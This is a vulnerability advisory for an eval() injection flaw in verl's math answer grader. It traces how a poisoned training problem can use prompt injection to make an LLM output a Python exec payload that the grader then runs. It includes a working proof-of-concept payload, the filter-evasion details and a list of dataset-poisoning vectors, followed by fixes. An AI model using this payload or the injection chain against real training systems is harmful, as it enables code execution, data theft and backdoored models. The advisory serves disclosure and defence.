| Field | Details |
|---|---|
| Vulnerability Name | Indirect Prompt Injection to ACE via Unsafe eval() in Math Answer Grading |
| Vulnerability Type | CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (eval Injection) |
| Affected Component | verl/utils/reward_score/prime_math/grader.py Line 298-301 |
| Affected Versions | verl ≤ 0.7.0 (main branch still affected as of analysis date) |
| CVSS 3.1 | 8.1 (High) — AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| GitHub | https://github.com/verl-project/verl |
| Dimension | Value | Rationale |
|---|---|---|
| Attack Vector | Network (N) | Attacker triggers remotely by poisoning training datasets, no local access required |
| Attack Complexity | High (H) | Requires indirectly controlling LLM output format via Prompt Injection, not direct parameter passing |
| Privileges Required | None (N) | No system authentication required |
| User Interaction | None (N) | Training/evaluation pipeline triggers automatically, no human intervention needed |
| Confidentiality | High (H) | Can read training data, model weights, API keys, etc. |
| Integrity | High (H) | Can tamper with model checkpoints, plant backdoors |
| Availability | High (H) | Can terminate training processes, destroy compute resources |
verl is an open-source large-model reinforcement learning training framework by ByteDance (19k+ Stars), supporting algorithms such as PPO and GRPO. In its math answer scoring module prime_math/grader.py, the math_equal() function compares whether the model-generated answer is equivalent to the ground-truth answer.
When the ground truth answer is a matrix type (containing \begin{pmatrix}) and the model's output answer starts with [ and ends with ], the code directly calls Python's built-in eval() function on the model output without any input sanitization or sandbox isolation.
An attacker can use Indirect Prompt Injection (injecting malicious instructions into the training dataset) to induce the LLM to output a string containing malicious Python code when answering matrix-type math problems. This string is extracted by match_answer(), passed into math_equal(), and ultimately executed by eval(), achieving arbitrary code execution (ACE).
File: verl/utils/reward_score/prime_math/grader.py Line 298-301
```python
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    if isinstance(eval(prediction), list):  # ← SINK: directly eval untrusted input
        pred_matrix = eval(prediction)      # ← second eval
```

Trigger conditions (all three must be satisfied simultaneously):

- `reference` (ground truth answer) contains `\begin{pmatrix}` — i.e., a matrix-type math problem
- `prediction` (answer extracted from the model) starts with `[` and ends with `]`
- `prediction` does not contain an underscore `_` — otherwise `handle_base()` will truncate it during the `normalize()` phase and throw a `ValueError`
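A minimal standalone sketch (variable names are illustrative, and a benign side effect stands in for a shell command; the real check lives inside `math_equal()`) shows how the three conditions route attacker-controlled text into `eval()`:

```python
# Standalone sketch of the vulnerable branch (names illustrative).
hits = []  # stand-in for an attacker-visible side effect

reference = r"\begin{pmatrix} 1 \\ 2 \end{pmatrix}"  # matrix-type ground truth
prediction = "[hits.append(1)]"  # starts with '[', ends with ']', has a digit, no underscore

if r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    pred_matrix = eval(prediction)  # SINK: attacker code runs before any isinstance check helps
```

Note that the attacker code executes as a side effect of evaluating the list expression itself, regardless of what the grader does with the resulting value.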
```
verl GRPO/PPO Training Loop
  └→ RewardManager.__call__()                       # compute reward score for each rollout
      └→ compute_score(solution_str, ground_truth)  # prime_math/__init__.py
          ├→ match_answer(solution_str)             # extract answer string from LLM output ← SOURCE
          │    └→ locate answer via keyword matching ("answer is", \boxed{}, etc.)
          │    └→ return (is_matched, prediction)   # prediction without any security filtering
          └→ math_equal(prediction, reference)      # grader.py Line 174
              └→ normalize(prediction, pi)          # Line 188 — preprocessing
              │    └→ handle_base(prediction)       # detect underscore _ and handle base conversion
              │    └→ handle_pi(prediction, pi)     # detect \pi and replace
              └→ [matrix comparison branch]         # Line 298-301
                  └→ eval(prediction)               # ← SINK: arbitrary code execution
```
File: verl/utils/reward_score/prime_math/__init__.py Line 347-386
```python
def match_answer(response):
    is_matched = False
    # extract answer from LLM output via keywords
    for ans_marker in ["answer:", "answer is", "answers are"]:
        ans_idx = response.lower().rfind(ans_marker)
        if ans_idx != -1:
            is_matched = True
            response = response[ans_idx + len(ans_marker):].strip()
    # ... more extraction logic (\boxed{}, "is", "=" etc.) ...
    # require the answer to contain at least one digit
    is_matched = is_matched if any([c.isdigit() for c in response]) else False
    return is_matched, response
```

The input `response` to `match_answer()` comes from the raw output of the LLM model (`solution_str`). This function only performs text locating and slicing, without any security filtering. In a Prompt Injection scenario, an attacker can manipulate problem descriptions in the training data to induce the model to output a malicious string in a specific format.
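A runnable condensation of just the keyword branch above (not the full verl function) shows that an injected payload survives extraction intact:

```python
# Condensed keyword extraction: the injected payload passes through unchanged.
response = 'The answer is [exec("import os; os.system(\'echo PWNED1\')")]'

marker = "answer is"
idx = response.lower().rfind(marker)
prediction = response[idx + len(marker):].strip()

# The only gate before math_equal() is "contains at least one digit":
has_digit = any(c.isdigit() for c in prediction)
```

Here `prediction` is exactly the raw bracketed payload, and the digit check is trivially satisfied by the `1` inside the shell command.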
| Condition | Description |
|---|---|
| Training data contains matrix-type problems | ground_truth must contain \begin{pmatrix}; such problems are common in the MATH dataset |
| LLM output can be controlled | Induce the model via Prompt Injection to output an answer in the [malicious code] format |
| Payload contains no underscore | handle_base() splits on _ causing crashes; must use exec() instead of __import__() |
| Payload contains a digit | match_answer() line 384 requires at least one digit character in the answer |
| verl uses prime_math scoring | Requires data_source to correspond to MATH dataset or manually specifying the prime_math scoring function |
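The three payload-level conditions in the table (bracket shape, no underscore, at least one digit) can be checked programmatically against the PoC payload used in the attack flow below:

```python
# Sanity check: the PoC payload satisfies every payload-level condition above.
payload = "[exec(\"import os; os.system('echo PWNED1 > /tmp/verl-rce-proof.txt')\")]"

shape_ok  = payload.startswith("[") and payload.endswith("]")  # enters matrix branch
no_under  = "_" not in payload                                 # survives handle_base()
has_digit = any(c.isdigit() for c in payload)                  # passes match_answer() gate
```

The remaining two conditions (a matrix-type ground truth and prime_math scoring) are environmental and depend on the victim's dataset and configuration.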
An attacker injects a "matrix problem" containing Prompt Injection instructions into a public math dataset. When other researchers use the verl framework for GRPO/PPO training on that dataset, the LLM is induced to output a malicious payload when answering that problem, and verl's scoring function automatically triggers eval() to execute arbitrary code.
Step 1: Attacker crafts a poisoned math problem (containing Prompt Injection)
↓
Step 2: Local LLM (Qwen2.5-14B-Instruct) receives the poisoned problem
↓
Step 3: LLM is successfully injected, outputs an answer containing malicious code:
"The answer is [exec("import os; os.system('echo PWNED1 > /tmp/verl-rce-proof.txt')")]"
↓
Step 4: verl compute_score() calls match_answer() to extract the answer
↓
Step 5: math_equal(prediction, reference) enters the matrix comparison branch
↓
Step 6: eval(prediction) executes the malicious code → writes to /tmp/verl-rce-proof.txt
↓
Step 7: RCE succeeds, attacker gains code execution on the training server
The following PoC has been verified successfully on macOS + Ollama (qwen2.5:14b-instruct) + verl 0.7.0.
```shell
# 1. Install Ollama and pull the model
curl -fsSL https://ollama.com/install.sh | sh
ollama pull qwen2.5:14b-instruct

# 2. Clone verl and install
git clone https://github.com/verl-project/verl.git
cd verl
pip install -e .
```
| Impact | Description |
|---|---|
| Arbitrary Code Execution | Attacker executes arbitrary system commands on the training/evaluation server |
| Data Theft | Read sensitive information such as training data, model weights, API keys, cloud credentials |
| Supply Chain Attack | Tamper with model checkpoints to plant backdoors, affecting all downstream users |
| Lateral Movement | Training clusters typically have high-privilege network access, can serve as a pivot for internal network penetration |
- Dataset Poisoning: An attacker injects matrix problems containing Prompt Injection into public math datasets (e.g., MATH, derived versions of GSM8K); triggered when researchers train with verl on that dataset
- Malicious Few-Shot: An attacker embeds malicious output templates in few-shot examples to induce the model to generate a payload during the evaluation phase
- Adversarial Input: Carefully crafted math problems that use token-level optimization to maximize the probability of the model outputting a malicious payload
Although CVSS rates Attack Complexity as High, actual exploitation is not particularly difficult:
- In GRPO training, each prompt generates 8-64 rollouts; triggering requires only one successful hit
- In testing, Qwen2.5-14B-Instruct was successfully injected on the first attempt
- The `exec()` payload bypasses `handle_base()` preprocessing and can reliably reach `eval()`
- Matrix-type problems are common in the MATH dataset; attackers do not need to craft their own ground_truth
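The underscore constraint can be illustrated with a simplified stand-in for `handle_base()` (the real verl code differs in detail, but the failure mode is the same: anything containing `_` is interpreted as base-N notation and crashes before reaching `eval()`):

```python
# Simplified stand-in for handle_base(): interprets "digits_base" notation.
def handle_base(x: str) -> str:
    if "_" in x:
        digits, base = x.split("_")[:2]
        return str(int(digits, int(base)))  # raises ValueError on code-like input
    return x

passed = handle_base('[exec("print(1)")]')  # no underscore: passes through untouched
try:
    handle_base('[__import__("os")]')       # underscores: parsed as base notation
    crashed = False
except ValueError:
    crashed = True                          # never reaches eval()
```

This is why a `__import__()`-style payload fails while a string handed to `exec()` (which contains no underscores in the outer expression) reaches the sink reliably.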
Replace eval() with ast.literal_eval(), which only allows parsing Python literals:
```python
import ast

# grader.py Line 298-301, before fix:
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    if isinstance(eval(prediction), list):  # ← dangerous
        pred_matrix = eval(prediction)      # ← dangerous

# After fix:
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    try:
        parsed = ast.literal_eval(prediction)  # ← safe: only accepts literals
        if isinstance(parsed, list):
            pred_matrix = parsed
            # ... subsequent comparison logic ...
    except (ValueError, SyntaxError):
        pass
```

`ast.literal_eval()` only accepts Python literals such as strings, numbers, lists, and dictionaries, and will not execute arbitrary code.
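The behavioral difference can be verified directly: literal matrix answers still parse, while anything containing a call or a name is refused without side effects:

```python
import ast

# Plain nested-list literals parse fine:
safe = ast.literal_eval("[[1, 0], [0, 1]]")

# Code-bearing strings are rejected before anything executes:
rejected = []
for malicious in ('[exec("print(1)")]', "[os.getcwd()]"):
    try:
        ast.literal_eval(malicious)
    except (ValueError, SyntaxError):
        rejected.append(malicious)  # refused without executing anything
```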
- Global audit of `eval()`/`exec()` calls: The `handle_pi()` function in `grader.py` (Line 82) also contains an `eval()` call; although it is wrapped with `contextlib.suppress(Exception)`, it should still be replaced
- Input validation allowlist: Add format validation at the output stage of `match_answer()`, only allowing mathematical-expression characters (digits, operators, brackets, commas)
- Sandbox isolation: Sandbox the execution environment of the reward function, restricting access to modules such as `os` and `subprocess`
- Dependency security scanning: Include `eval()` usage in CI/CD security checks to prevent new eval injection points from being introduced in subsequent code
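The allowlist idea from the second item could be sketched as follows; the pattern and function name are illustrative assumptions, not verl code:

```python
import re

# Permit only characters plausible in a numeric matrix answer:
# digits, signs, decimal points, brackets, commas, whitespace, '/',
# and 'e'/'E' for scientific notation.
SAFE_ANSWER = re.compile(r"[0-9eE+\-*/.,\[\]()\s]*")

def is_safe_answer(prediction: str) -> bool:
    return SAFE_ANSWER.fullmatch(prediction) is not None
```

Under this pattern, `is_safe_answer("[1, 2, 3]")` passes while `is_safe_answer('[exec("import os")]')` is rejected, since any alphabetic character other than `e`/`E` falls outside the allowlist.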